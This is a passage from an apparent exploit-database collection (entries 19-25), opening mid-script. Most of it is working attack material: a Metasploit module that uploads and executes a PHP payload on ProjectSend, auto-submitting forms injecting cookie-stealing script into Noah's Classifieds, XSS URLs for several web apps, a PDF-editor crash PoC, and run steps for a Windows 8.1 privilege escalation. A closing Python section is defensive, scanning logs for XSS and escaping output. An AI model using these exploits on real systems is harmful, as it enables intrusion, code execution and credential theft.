    echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed !\n";
}

print_r("
-==[ Finished ]==-
");
# By Lagripe-Dz .. !
# END .. !
?>
  19. source: https://www.securityfocus.com/bid/47571/info

eXPert PDF is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds check user-supplied data before copying it into an insufficiently sized buffer.

An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

#!/usr/bin/perl
sub logo {
print STDERR << "EOF";
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
EOF
}
# ---------
# eXPert PDF Editor 7 Professional Heap Proof Of Concept Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : Inj3ct0r Team + exploit-id Team
# ---------
# Target : eXPert PDF Editor v7.0.880.0
# Tested in Windows XP sp3 France
# Creating The Bad File .PJ And => Bo0M !
# Heap 0x0174EC24 in 'vspdfeditor140.bpl' . addres 00000008

my $PoC = "\x4b\x45\x44\x41\x4e\x53"; # NULL Heap PoC
open (FILE,">> KedAns.pj"); # Bad File Here
print FILE $PoC;
close (FILE);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans
  20. source: https://www.securityfocus.com/bid/47576/info

html-edit CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

html-edit CMS 3.1.9 is vulnerable; other versions may also be affected.

http://www.example.com/[Path]/addons/image_slider/index.php?html_output=[XSS]
  21. # Exploit Title: Social Microblogging PRO 1.5 Stored XSS Vulnerability
# Date: 29-12-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.5
# Vendor Homepage: http://codecanyon.net/item/social-microblogging-pro/9217005
# Tested on: Chrome & Iceweasel
# Vulnerability Description:

===Stored XSS===
"Web Site" input is not secure at Profile section. You can run XSS payloads on "Web Site" input.

Sample Payload for Stored XSS:
http://example.com/">[xssPayload]

=Solution=
Filter the input field against XSS attacks.
================
  22. ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'ProjectSend Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability in ProjectSend
        revisions 100 to 561. The 'process-upload.php' file allows
        unauthenticated users to upload PHP files resulting in remote
        code execution as the web server user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Fady Mohammed Osman', # Discovery and Exploit
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '35424']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
          ['ProjectSend (PHP Payload)', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 02 2014',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
      ], self.class)
  end

  #
  # Checks if target upload functionality is working
  #
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'process-upload.php')
    )

    if !res
      vprint_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    elsif res.code.to_i == 404
      vprint_error("#{peer} - No process-upload.php found")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 500
      vprint_error("#{peer} - Unable to write file")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
      vprint_error("#{peer} - File process-upload.php is not executable")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
      vprint_error("#{peer} - Software is misconfigured")
      return Exploit::CheckCode::Safe
    elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
      # response on revision 118 onwards includes the file name
      if res.body && res.body =~ /NewFileName/
        return Exploit::CheckCode::Vulnerable
      # response on revisions 100 to 117 does not include the file name
      elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
        return Exploit::CheckCode::Appears
      elsif res.body && res.body =~ /Failed to open output stream/
        vprint_error("#{peer} - Upload folder is not writable")
        return Exploit::CheckCode::Safe
      else
        return Exploit::CheckCode::Detected
      end
    else
      return Exploit::CheckCode::Safe
    end
  end

  #
  # Upload PHP payload
  #
  def upload
    fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
    php = "<?php #{payload.encoded} ?>"
    data = Rex::MIME::Message.new
    data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
    post_data = data.to_s

    print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    )

    if !res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
    elsif res.code.to_i == 500
      fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
    elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
      fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
    elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
      fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
    elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
      fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
    # response on revision 118 onwards includes the file name
    elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
      print_good("#{peer} - Payload uploaded successfully (#{fname})")
      return fname
    # response on revisions 100 to 117 does not include the file name
    elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
      print_warning("#{peer} - File upload may have failed")
      return fname
    else
      vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}")
      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
    end
  end

  #
  # Execute uploaded file
  #
  def exec(upload_path)
    print_status("#{peer} - Executing #{upload_path}...")
    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5)
    if !res
      print_status("#{peer} - Request timed out while executing")
    elsif res.code.to_i == 404
      vprint_error("#{peer} - Not found: #{upload_path}")
    elsif res.code.to_i == 200
      vprint_good("#{peer} - Executed #{upload_path}")
    else
      print_error("#{peer} - Unexpected reply")
    end
  end

  #
  # upload && execute
  #
  def exploit
    fname = upload
    register_files_for_cleanup(fname)
    exec("upload/files/#{fname}") # default for r-221 onwards
    unless session_created?
      exec("upload/temp/#{fname}") # default for r-100 to r-219
    end
  end

end
  23. source: https://www.securityfocus.com/bid/47578/info

Noah's Classifieds is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="list" value="item">
<input type="hidden" name="method" value="create">
<input type="hidden" name="rollid" value="2">
<input type="hidden" name="id" value="0">
<input type="hidden" name="cid" value="2">
<input type="hidden" name="col_16" value="">
<input type="hidden" name="col_17" value='title"><script>alert(document.cookie)</script>'>
<input type="hidden" name="col_18" value='<p>description of my"&gt;</p>
<script type="text/javascript">// <![CDATA[
alert(document.cookie)
// ]]></script>'>
<input type="hidden" name="col_19" value="Pc">
<input type="hidden" name="col_20" value="">
<input type="hidden" name="gsubmit" value="Ok">
</form>
<script>
document.main.submit();
</script>

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="list" value="appcategory">
<input type="hidden" name="method" value="modify">
<input type="hidden" name="rollid" value="5">
<input type="hidden" name="id" value="5">
<input type="hidden" name="up" value="1">
<input type="hidden" name="wholeName" value="catitem">
<input type="hidden" name="name" value="catitem">
<input type="hidden" name="description" value='cat2"><script>alert(document.cookie)</script>'>
<input type="hidden" name="picture" value="">
<input type="hidden" name="descriptionMeta" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="customAdMeta" value="">
<input type="hidden" name="allowAd" value="1">
<input type="hidden" name="immediateAppear" value="1">
<input type="hidden" name="inactivateOnModify" value="1">
<input type="hidden" name="displayResponseLink" value="1">
<input type="hidden" name="displayFriendmailLink" value="1">
<input type="hidden" name="displayFlaggedLink" value="1">
<input type="hidden" name="customAdListTitle" value="">
<input type="hidden" name="customAdListTemplate" value="">
<input type="hidden" name="customAdDetailsTemplate" value="">
<input type="hidden" name="gsubmit" value="Ok">
</form>
<script>
document.main.submit();
</script>

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="list" value="appsettings">
<input type="hidden" name="method" value="modify">
<input type="hidden" name="rollid" value="1">
<input type="hidden" name="id" value="1">
<input type="hidden" name="defaultTheme" value="modern">
<input type="hidden" name="defaultLanguage" value="en">
<input type="hidden" name="langDir" value="ltr">
<input type="hidden" name="adminEmail" value="">
<input type="hidden" name="titlePrefix" value='[Noahs Classifieds]</title><script>alert(document.cookie)</script>'>
<input type="hidden" name="mainTitle" value="">
<input type="hidden" name="charLimit" value="0">
<input type="hidden" name="blockSize" value="20">
<input type="hidden" name="dateFormat" value="Y-m-d">
<input type="hidden" name="timeFormat" value="Y-m-d H:i">
<input type="hidden" name="gsubmit" value="Ok">
</form>
<script>
document.main.submit();
</script>
  24. # Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35661-poc.zip

Platform: Windows 8.1 Update 32/64 bit (No other OS tested)

On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext.

This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token and LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways.

It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for a UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse.

It's unclear if Windows 7 is vulnerable as the code path for update has a TCB privilege check on it (although it looks like depending on the flags this might be bypassable). No effort has been made to verify it on Windows 7.

NOTE: This is not a bug in UAC, it is just using UAC auto elevation for demonstration purposes.

The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. I'd recommend running on 32 bit just to be sure. To verify perform the following steps:

1) Put the AppCompatCache.exe and Testdll.dll on disk
2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables).
3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll".
4) If successful then the calculator should appear running as an administrator. If it doesn't work the first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run.
  25. source: https://www.securityfocus.com/bid/47579/info

The WP Ajax Recent Posts WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

WP Ajax Recent Posts WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected.

http://www.example.com/?action=wpAjaxRecentPosts&number=1%27%29%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
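Both the Noah's Classifieds HTML-injection PoC (item 23) and the WP Ajax Recent Posts XSS (item 25) come down to a user-controlled value breaking out of the HTML context it is written into, either a quoted attribute (`"><script>`) or an element such as `</title>`. The Python below is an added example and is not part of either advisory or of the affected software. It does two things a defender wants: it scans web-server access-log lines for percent-encoded tag openers in query parameters (the log lines, client IPs and the `col_17` request are constructed for illustration; the first line reproduces the request shape from item 25), and it shows the output encoding that neutralises the stored payloads from item 23 when they are rendered back into an attribute and an element.

```python
import re
from html import escape
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from either advisory). The first
# mirrors the item 25 request; the third mirrors the item 23 col_17 payload as a GET.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2014:10:01:02 +0000] "GET /?action=wpAjaxRecentPosts&number=1%27%29%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E HTTP/1.1" 200 512
203.0.113.6 - - [26/Dec/2014:10:01:03 +0000] "GET /?action=wpAjaxRecentPosts&number=5 HTTP/1.1" 200 2048
203.0.113.7 - - [26/Dec/2014:10:01:04 +0000] "GET /index.php?list=item&method=create&col_17=title%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 300
"""

# Request line inside a common/combined log format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers of an attempt to break out of an HTML context: a <script> tag (open or
# close), any tag carrying an on* event-handler attribute, or a javascript: URL.
XSS_MARKERS = re.compile(
    r'<\s*/?\s*script|<\s*[a-z]+\b[^>]*\bon[a-z]+\s*=|javascript\s*:',
    re.IGNORECASE,
)


def decode_param(value, rounds=2):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are visible."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(target):
    """Split the query string of a request target into decoded (name, value) pairs.

    Done by hand rather than with urllib.parse.parse_qsl so that ';' inside a
    value is never treated as a pair separator, whatever the Python version.
    """
    query = target.partition("?")[2]
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), decode_param(value)))
    return params


def suspicious_params(target):
    """Return [(name, decoded_value)] for query parameters carrying XSS markers."""
    return [(n, v) for n, v in parse_query(target) if XSS_MARKERS.search(v)]


def scan_log(text):
    """Return [(client_ip, param_name, decoded_value)] for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group("target")):
            findings.append((client_ip, name, value))
    return findings


def render_title(user_title):
    """Render a stored field into the two contexts abused in item 23.

    html.escape with quote=True encodes <, >, &, " and ', so the value can
    neither close the attribute nor close the <title> element.
    """
    safe = escape(user_title, quote=True)
    return '<input name="title" value="%s"><title>%s</title>' % (safe, safe)


if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print("%s  param=%s  value=%r" % (ip, name, value))
    print(render_title('title"><script>alert(document.cookie)</script>'))
```

The scanner decodes before matching because both PoCs arrive percent-encoded; matching the raw query string would miss them. The rendering side is the fix the advisories imply: encode at the point of output for the context being written into, rather than trying to strip tags on input.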